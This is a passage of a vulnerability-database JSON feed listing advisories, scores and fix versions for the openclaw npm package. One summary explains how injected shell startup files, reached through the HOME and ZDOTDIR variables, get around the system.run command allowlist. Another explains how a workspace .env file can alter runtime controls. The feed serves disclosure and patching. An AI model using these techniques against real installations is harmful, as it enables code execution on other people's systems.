s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntw
t-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7s
d-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33580","GHSA-9528-x887-j2fp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pc9z-x5wk-8ue7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91630?format=json","vulnerability_id":"VCID-pdgz-5fu2-g7af","summary":"Duplicate Advisory: OpenClaw's shell startup env injection bypasses system.run allowlist intent (RCE class)\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-xgf2-vxv2-rrmg. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 fail to sanitize shell startup environment variables HOME and ZDOTDIR in the system.run function, allowing attackers to bypass command allowlist protections. 
Remote attackers can inject malicious startup files such as .bash_profile or .zshenv to achieve arbitrary code execution before allowlist-evaluated commands are executed.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/c2c7114ed39a547ab6276e1e933029b9530ee906","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/c2c7114ed39a547ab6276e1e933029b9530ee906"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shell-startup-environment-variable-injection-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-shell-startup-environment-variable-injection-in-system-run"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32056","reference_id":"CVE-2026-32056","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/M
AV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32056"},{"reference_url":"https://github.com/advisories/GHSA-rj39-33v7-9xrq","reference_id":"GHSA-rj39-33v7-9xrq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rj39-33v7-9xrq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xgf2-vxv2-rrmg","reference_id":"GHSA-xgf2-vxv2-rrmg","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xgf2-vxv2-rrmg"}],"fixed_packages":[],"aliases":["GHSA-rj39-33v7-9xrq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pdgz-5fu2-g7af"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89369?format=json","vulnerability_id":"VCID-pdmd-a4fg-8fcg","summary":"OpenClaw: Workspace .env could inject OpenClaw runtime-control variables\n## Summary\n\nWorkspace .env could inject OpenClaw runtime-control variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nA malicious workspace `.env` file could set OpenClaw runtime-control variables affecting update sources, gateway URLs, ClawHub resolution, browser executable paths, and related 
behavior.\n\n## Technical Details\n\nThe fix blocks OpenClaw runtime-control keys and key families from workspace `.env` loading.\n\n## Fix\n\nThe issue was fixed in #62660. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `dbfcef319618158fa40b31cdac386ea34c392c0c`\n- PR: #62660\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43531","reference_id":"","reference_type":"","scores":[{"value":"0.00028","scoring_system":"epss","scoring_elements":"0.0832","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09649","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00032","scoring_system":"epss","scoring_elements":"0.09673","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43531"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_sy
stem":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"}],"url":"https://github.com/openclaw/openclaw/commit/dbfcef319618158fa40b31cdac386ea34c392c0c"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62660","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62660"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-7wv4-cc7p-jhxc"},{"reference_url":"
https://nvd.nist.gov/vuln/detail/CVE-2026-43531","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43531"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T13:49:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-environment-variable-injection-via-workspace-env-file"},{"reference_url":"https://github.com/advisories/GHSA-7wv4-cc7p-jhxc","reference_id":"GHSA-7wv4-cc7p-jhxc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7wv4-cc7p-jhxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110121?format=json","purl":"pkg:npm/openclaw@2026.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerabili
ty":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-k8x3-9pv7-rfax"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rvcq-rqbq-4khp"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerabili
ty":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"}],"aliases":["CVE-2026-43531","GHSA-7wv4-cc7p-jhxc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pdmd-a4fg-8fcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91444?format=json","vulnerability_id":"VCID-pgdr-mvc3-2kg3","summary":"OpenClaw's mutating internal ACP chat commands missed operator.admin scope enforcement\n## Summary\nMutating internal ACP chat commands missed the operator.admin gate that should separate read-only and mutating control-plane actions.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `229426a257e49694a59fa4e3895861d02a4d767f`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/auto-reply/reply/commands-acp.ts now requires operator.admin for mutating internal ACP actions.\n- src/auto-reply/reply/commands-acp.test.ts ships regression coverage for non-admin denial and admin success cases.\n\nOpenClaw thanks @tdjackey for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/229426a257e49694a59fa4e3895861d02a4d767f"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3w6x-gv34-mqpf"},{"reference_url":"https://github.com/advisories/GHSA-3w6x-gv34-mqpf","reference_id":"GHSA-3w6x-gv34-mqpf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3w6x-gv34-mqpf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24
m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9h
cd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-c